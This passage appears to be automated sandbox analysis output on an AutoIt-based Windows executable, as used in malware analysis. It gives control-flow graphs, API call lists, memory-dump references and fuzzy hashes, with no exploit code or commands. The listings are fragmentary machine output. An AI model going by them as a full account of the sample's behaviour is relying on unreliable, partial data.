                                                                                                                                                        control_flow_graph 1342 aeb74b-aeb7ac VariantInit call a9ca8e CoInitialize 1345 aeb7ae CoUninitialize 1342->1345 1346 aeb7b4-aeb7c7 call aad5f6 1342->1346 1345->1346 1349 aeb7c9-aeb7d0 call a9ca8e 1346->1349 1350 aeb7d5-aeb7dc 1346->1350 1349->1350 1351 aeb7de-aeb805 call a984a6 call aca857 1350->1351 1352 aeb81b-aeb85b call a984a6 call aaf885 1350->1352 1351->1352 1362 aeb807-aeb816 call aec235 1351->1362 1363 aeb9d3-aeba17 SetErrorMode CoGetInstanceFromFile 1352->1363 1364 aeb861-aeb86e 1352->1364 1380 aebad0-aebae3 VariantClear 1362->1380 1365 aeba1f-aeba3a CoGetObject 1363->1365 1366 aeba19-aeba1d 1363->1366 1368 aeb8a8-aeb8b6 GetRunningObjectTable 1364->1368 1369 aeb870-aeb881 call aad5f6 1364->1369 1371 aeba3c 1365->1371 1372 aebab5-aebac5 call aec235 SetErrorMode 1365->1372 1370 aeba40-aeba47 SetErrorMode 1366->1370 1374 aeb8b8-aeb8c9 1368->1374 1375 aeb8d5-aeb8e8 call aec235 1368->1375 1383 aeb883-aeb88d call a9cdb4 1369->1383 1384 aeb8a0 1369->1384 1379 aeba4b-aeba51 1370->1379 1371->1370 1389 aebac7-aebacb call a95cd3 1372->1389 1393 aeb8ed-aeb8fc 1374->1393 1394 aeb8cb-aeb8d0 1374->1394 1375->1389 1386 aebaa8-aebaab 1379->1386 1387 aeba53-aeba55 1379->1387 1383->1384 1401 aeb88f-aeb89e call a9cdb4 1383->1401 1384->1368 1386->1372 1391 aeba8d-aebaa6 call ada6f6 1387->1391 1392 aeba57-aeba78 call acac4b 1387->1392 1389->1380 1391->1389 1392->1391 1404 aeba7a-aeba83 1392->1404 1400 aeb907-aeb91b 1393->1400 1394->1375 1407 aeb9bb-aeb9d1 1400->1407 1408 aeb921-aeb925 1400->1408 1401->1368 1404->1391 1407->1379 1408->1407 1410 aeb92b-aeb940 1408->1410 1414 aeb9a2-aeb9ac 1410->1414 1415 aeb942-aeb957 1410->1415 1414->1400 1415->1414 1418 aeb959-aeb983 call acac4b 1415->1418 1422 aeb994-aeb99e 1418->1422 1423 aeb985-aeb98d 1418->1423 1422->1414 1424 aeb98f-aeb990 1423->1424 1425 aeb9b1-aeb9b6 1423->1425 1424->1422 1425->1407
                                                                                                                                                        APIs
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00AEB777
                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00AEB7A4
                                                                                                                                                        • CoUninitialize.COMBASE ref: 00AEB7AE
                                                                                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00AEB8AE
                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00AEB9DB
                                                                                                                                                        • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 00AEBA0F
                                                                                                                                                        • CoGetObject.OLE32(?,00000000,00B1D91C,?), ref: 00AEBA32
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00AEBA45
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00AEBAC5
                                                                                                                                                        • VariantClear.OLEAUT32(00B1D91C), ref: 00AEBAD5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2395222682-0
                                                                                                                                                        • Opcode ID: 1e316a46b2cddc55daf97c5c29c3bc3758074653166b55de895e3fcbb51b5c67
                                                                                                                                                        • Instruction ID: 973e4e4d758a16adfecc62a4b5e63dd55a806b1f4e013f45cf4461bb04607866
                                                                                                                                                        • Opcode Fuzzy Hash: 1e316a46b2cddc55daf97c5c29c3bc3758074653166b55de895e3fcbb51b5c67
                                                                                                                                                        • Instruction Fuzzy Hash: D4C14571618345AFC700DF69C888A6BB7E9FF88358F00495DF58A9B251DB30ED01CB62
                                                                                                                                                        Function 00A92F58 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53registrywindowclipboardCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00A92F8B
                                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00A92FB5
                                                                                                                                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00A92FC6
                                                                                                                                                        • LoadIconW.USER32(000000A9), ref: 00A93009
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                        • API String ID: 975902462-1005189915
                                                                                                                                                        • Opcode ID: 9caac2435c4449da80fd44e653dc33e2502d41facbff9b741d1fecea51e63188
                                                                                                                                                        • Instruction ID: 584789cb2ae79e073c8e87f28fc1e0f9257b5eb674b0cd9772254fc63eed773b
                                                                                                                                                        • Opcode Fuzzy Hash: 9caac2435c4449da80fd44e653dc33e2502d41facbff9b741d1fecea51e63188
                                                                                                                                                        • Instruction Fuzzy Hash: F021C4B5900318AFDB10DFA8E849BCEBBF4FB08701F50895AF615A72A0DBB44544CF91
                                                                                                                                                        Function 00AF23C5 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1431 af23c5-af2426 call ab1970 1434 af2428-af243b call a9cdb4 1431->1434 1435 af2452-af2456 1431->1435 1443 af243d-af2450 call a9cdb4 1434->1443 1444 af2488 1434->1444 1436 af249d-af24a3 1435->1436 1437 af2458-af2468 call a9cdb4 1435->1437 1439 af24b8-af24be 1436->1439 1440 af24a5-af24a8 1436->1440 1452 af246b-af2484 call a9cdb4 1437->1452 1446 af24c8-af24e2 call a984a6 call a93bcf 1439->1446 1447 af24c0 1439->1447 1445 af24ab-af24b0 call a9cdb4 1440->1445 1443->1452 1453 af248b-af248f 1444->1453 1445->1439 1464 af24e8-af2541 call a984a6 call a93bcf call a984a6 call a93bcf call a984a6 call a93bcf 1446->1464 1465 af25a1-af25a9 1446->1465 1447->1446 1452->1436 1463 af2486 1452->1463 1458 af2499-af249b 1453->1458 1459 af2491-af2497 1453->1459 1458->1436 1458->1439 1459->1445 1463->1453 1511 af256f-af259f GetSystemDirectoryW call ab010a GetSystemDirectoryW 1464->1511 1512 af2543-af255e call a984a6 call a93bcf 1464->1512 1466 af25ab-af25c6 call a984a6 call a93bcf 1465->1466 1467 af25d3-af2601 GetCurrentDirectoryW call ab010a GetCurrentDirectoryW 1465->1467 1466->1467 1484 af25c8-af25d1 call ab18fb 1466->1484 1476 af2605 1467->1476 1478 af2609-af260d 1476->1478 1481 af260f-af2639 call a9ca8e * 3 1478->1481 1482 af263e-af264e call ad9a8f 1478->1482 1481->1482 1495 af26aa 1482->1495 1496 af2650-af269b call ada17a call ada073 call ada102 1482->1496 1484->1467 1484->1482 1497 af26ac-af26bb 1495->1497 1496->1497 1525 af269d-af26a8 1496->1525 1501 af274c-af2768 CreateProcessW 1497->1501 1502 af26c1-af26f1 call acbc90 call ab18fb 1497->1502 1508 af276b-af277e call ab017e * 2 1501->1508 1526 af26fa-af270a call ab18fb 1502->1526 1527 af26f3-af26f8 1502->1527 1532 af27bd-af27c9 CloseHandle 1508->1532 1533 af2780-af27b8 call add7e4 GetLastError call a97ba9 call aa2570 1508->1533 1511->1476 1512->1511 1538 af2560-af2569 call ab18fb 1512->1538 1525->1497 1541 af270c-af2711 1526->1541 1542 af2713-af2723 call ab18fb 1526->1542 1527->1526 1527->1527 1535 af27cb-af27f0 call ad9d09 call ada37f call af2881 1532->1535 1536 af27f5-af27f9 1532->1536 1551 af283e-af284f call ad9b29 1533->1551 1535->1536 1543 af27fb-af2805 1536->1543 1544 af2807-af2811 1536->1544 1538->1478 1538->1511 1541->1541 1541->1542 1558 af272c-af274a call ab017e * 3 1542->1558 1559 af2725-af272a 1542->1559 1543->1551 1546 af2819-af2838 call aa2570 CloseHandle 1544->1546 1547 af2813 1544->1547 1546->1551 1547->1546 1558->1508 1559->1558 1559->1559
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AF23E6
                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00AF2579
                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00AF259D
                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00AF25DD
                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00AF25FF
                                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AF2760
                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00AF2792
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00AF27C1
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00AF2838
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4090791747-0
                                                                                                                                                        • Opcode ID: 7d23601338715af0ce084c4e32294f8cff1292303314c044eb071745676ddd86
                                                                                                                                                        • Instruction ID: e5efd82413fb31dbaf5ceeea81788936146433d01724bd19df93d6a5114372c9
                                                                                                                                                        • Opcode Fuzzy Hash: 7d23601338715af0ce084c4e32294f8cff1292303314c044eb071745676ddd86
                                                                                                                                                        • Instruction Fuzzy Hash: 89D1BD31604305DFCB14EF64C991B6ABBE5EF85320F14885DF9899B2A2DB30DC41CB52
                                                                                                                                                        Function 00AEC8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1572 aec8b7-aec8f1 1573 aeccfb-aeccff 1572->1573 1574 aec8f7-aec8fa 1572->1574 1575 aecd04-aecd05 1573->1575 1574->1573 1576 aec900-aec903 1574->1576 1577 aecd06 call aec235 1575->1577 1576->1573 1578 aec909-aec912 call aecff8 1576->1578 1581 aecd0b-aecd0f 1577->1581 1583 aec914-aec920 1578->1583 1584 aec925-aec92e call adbe14 1578->1584 1583->1577 1587 aec934-aec93a 1584->1587 1588 aecc61-aecc6c call a9d2c0 1584->1588 1589 aec93c-aec93e 1587->1589 1590 aec940 1587->1590 1596 aecc6e-aecc72 1588->1596 1597 aecca9-aeccb4 call a9d2c0 1588->1597 1592 aec942-aec94a 1589->1592 1590->1592 1594 aeccec-aeccf4 1592->1594 1595 aec950-aec967 call acabf3 1592->1595 1594->1573 1606 aec969-aec96e 1595->1606 1607 aec973-aec97f 1595->1607 1600 aecc78 1596->1600 1601 aecc74-aecc76 1596->1601 1597->1594 1605 aeccb6-aeccba 1597->1605 1604 aecc7a-aecc98 call aad6b4 call ad97b6 1600->1604 1601->1604 1622 aecc99-aecca7 call add7e4 1604->1622 1609 aeccbc-aeccbe 1605->1609 1610 aeccc0 1605->1610 1606->1575 1611 aec9ce-aec9f9 call aafa89 1607->1611 1612 aec981-aec98d 1607->1612 1615 aeccc2-aeccea call aad6b4 call ad503c call aa2570 1609->1615 1610->1615 1623 aec9fb-aeca16 call aaac65 1611->1623 1624 aeca18-aeca1a 1611->1624 1612->1611 1616 aec98f-aec99c call aca8c8 1612->1616 1615->1622 1626 aec9a1-aec9a6 1616->1626 1622->1581 1629 aeca1d-aeca24 1623->1629 1624->1629 1626->1611 1631 aec9a8-aec9af 1626->1631 1636 aeca26-aeca30 1629->1636 1637 aeca52-aeca59 1629->1637 1632 aec9be-aec9c5 1631->1632 1633 aec9b1-aec9b8 1631->1633 1632->1611 1642 aec9c7 1632->1642 1633->1632 1639 aec9ba 1633->1639 1643 aeca32-aeca48 call aca25b 1636->1643 1640 aecadf-aecaec 1637->1640 1641 aeca5f-aeca66 1637->1641 1639->1632 1646 aecaee-aecaf8 1640->1646 1647 aecafb-aecb28 VariantInit call ab1970 1640->1647 1641->1640 1645 aeca68-aeca7b 1641->1645 1642->1611 1653 aeca4a-aeca50 1643->1653 1650 aeca7c-aeca84 1645->1650 1646->1647 1657 aecb2d-aecb30 1647->1657 1658 aecb2a-aecb2b 1647->1658 1654 aeca86-aecaa3 VariantClear 1650->1654 1655 aecad1-aecada 1650->1655 1653->1637 1659 aecabc-aecacc 1654->1659 1660 aecaa5-aecab9 SysAllocString 1654->1660 1655->1650 1661 aecadc 1655->1661 1662 aecb31-aecb43 1657->1662 1658->1662 1659->1655 1663 aecace 1659->1663 1660->1659 1661->1640 1664 aecb47-aecb4c 1662->1664 1663->1655 1665 aecb4e-aecb52 1664->1665 1666 aecb8a-aecb8c 1664->1666 1667 aecb54-aecb86 1665->1667 1668 aecba1-aecba5 1665->1668 1669 aecb8e-aecb95 1666->1669 1670 aecbb4-aecbd5 call add7e4 call ada6f6 1666->1670 1667->1666 1673 aecba6-aecbaf call aec235 1668->1673 1669->1668 1672 aecb97-aecb9f 1669->1672 1679 aecc41-aecc50 VariantClear 1670->1679 1682 aecbd7-aecbe0 1670->1682 1672->1673 1673->1679 1680 aecc5a-aecc5c 1679->1680 1681 aecc52-aecc55 call ad1693 1679->1681 1680->1581 1681->1680 1684 aecbe2-aecbef 1682->1684 1685 aecc38-aecc3f 1684->1685 1686 aecbf1-aecbf8 1684->1686 1685->1679 1685->1684 1687 aecbfa-aecc0a 1686->1687 1688 aecc26-aecc2a 1686->1688 1687->1685 1689 aecc0c-aecc14 1687->1689 1690 aecc2c-aecc2e 1688->1690 1691 aecc30 1688->1691 1689->1688 1692 aecc16-aecc1c 1689->1692 1693 aecc32-aecc33 call ada6f6 1690->1693 1691->1693 1692->1688 1694 aecc1e-aecc24 1692->1694 1693->1685 1694->1685 1694->1688
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                        • API String ID: 0-572801152
                                                                                                                                                        • Opcode ID: 0a5e1303f16fb98795032268325150d1b6feac0bdcd3ec812c1be0800e3ec163
                                                                                                                                                        • Instruction ID: c2c6e97f04fe03f06f7aaeb87a80c18363bc3e817bd557c4db35e651b07584fd
                                                                                                                                                        • Opcode Fuzzy Hash: 0a5e1303f16fb98795032268325150d1b6feac0bdcd3ec812c1be0800e3ec163
                                                                                                                                                        • Instruction Fuzzy Hash: 70E1D471A00259AFDF10DFA9C981BEE77B9FF48364F148069F949AB281D7709D42CB90
                                                                                                                                                        Function 00AEBF80 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1696 aebf80-aebfcd 1697 aebfd9-aebfe1 1696->1697 1698 aebfd4 call ab1970 1696->1698 1699 aec21b-aec21d 1697->1699 1700 aebfe7-aebfeb 1697->1700 1698->1697 1701 aec21e-aec21f 1699->1701 1700->1699 1702 aebff1-aebff6 1700->1702 1703 aec224-aec226 1701->1703 1702->1699 1704 aebffc-aec00b call adbe14 1702->1704 1706 aec227 1703->1706 1709 aec158-aec15c 1704->1709 1710 aec011-aec015 1704->1710 1708 aec229 call aec235 1706->1708 1716 aec22e-aec232 1708->1716 1714 aec15e-aec160 1709->1714 1715 aec16d 1709->1715 1712 aec01b 1710->1712 1713 aec017-aec019 1710->1713 1717 aec01d-aec01f 1712->1717 1713->1717 1718 aec16f-aec171 1714->1718 1715->1718 1719 aec033-aec03e 1717->1719 1720 aec021-aec025 1717->1720 1718->1701 1721 aec177-aec17b 1718->1721 1719->1706 1720->1719 1722 aec027-aec031 1720->1722 1723 aec17d-aec17f 1721->1723 1724 aec181 1721->1724 1722->1719 1725 aec043-aec05f 1722->1725 1726 aec183-aec186 1723->1726 1724->1726 1733 aec067-aec081 1725->1733 1734 aec061-aec065 1725->1734 1727 aec188-aec18e 1726->1727 1728 aec193-aec197 1726->1728 1727->1703 1729 aec19d 1728->1729 1730 aec199-aec19b 1728->1730 1732 aec19f-aec1c9 VariantInit VariantClear 1729->1732 1730->1732 1739 aec1cb-aec1cd 1732->1739 1740 aec1e6-aec1ea 1732->1740 1741 aec089 1733->1741 1742 aec083-aec087 1733->1742 1734->1733 1735 aec090-aec0e5 call aafa89 VariantInit call ab1a00 1734->1735 1758 aec108-aec10d 1735->1758 1759 aec0e7-aec0f1 1735->1759 1739->1740 1744 aec1cf-aec1e1 call aa2570 1739->1744 1745 aec1ec-aec1ee 1740->1745 1746 aec1f0-aec1fe call aa2570 1740->1746 1741->1735 1742->1735 1742->1741 1757 aec0fb-aec0fe 1744->1757 1745->1746 1749 aec201-aec219 call ada6f6 VariantClear 1745->1749 1746->1749 1749->1716 1757->1708 1762 aec10f-aec131 1758->1762 1763 aec162-aec16b 1758->1763 1760 aec103-aec106 1759->1760 1761 aec0f3-aec0fa 1759->1761 1760->1757 1761->1757 1766 aec13b-aec13d 1762->1766 1767 aec133-aec139 1762->1767 1763->1757 1768 aec141-aec157 call ada6f6 1766->1768 1767->1757 1768->1709
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Variant$ClearInit$_memset
                                                                                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                        • API String ID: 2862541840-625585964
                                                                                                                                                        • Opcode ID: 2824bba5cf30e1982139e74894f4890a25b9760ffc5f6ed84b3c87e49d952833
                                                                                                                                                        • Instruction ID: 7c9b52fe13ac65fe90c9e1575139204d530944960d0c7aa76e6cced0fb47d2ce
                                                                                                                                                        • Opcode Fuzzy Hash: 2824bba5cf30e1982139e74894f4890a25b9760ffc5f6ed84b3c87e49d952833
                                                                                                                                                        • Instruction Fuzzy Hash: DC91BF71A00255EBDF24DFA6CC44FEEBBB8AF45720F108559F515AB281D7709A42CFA0
                                                                                                                                                        Function 00AAEB05 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00AAEADA,?,?), ref: 00AAEB27
                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,00AAEADA,?,?), ref: 00B04B26
                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,00AAEADA,?,?), ref: 00B04B65
                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00AAEADA,?,?), ref: 00B04B94
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: QueryValue$CloseOpen
                                                                                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                                        • API String ID: 1586453840-614718249
                                                                                                                                                        • Opcode ID: b82ba2bfe1d238aadb12b69c6a43367bfa7a2b83af8e5c292208975f44259cad
                                                                                                                                                        • Instruction ID: af74244660528c4d531611bb33ce0be9abfc001986deaeb1cd36fc422f034059
                                                                                                                                                        • Opcode Fuzzy Hash: b82ba2bfe1d238aadb12b69c6a43367bfa7a2b83af8e5c292208975f44259cad
                                                                                                                                                        • Instruction Fuzzy Hash: 2A113D71601118BEEF05DBA4DD9AEFE77BCEB08354F504059B506E70A1EA709E01D760
                                                                                                                                                        Function 00A92E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00A92ECB
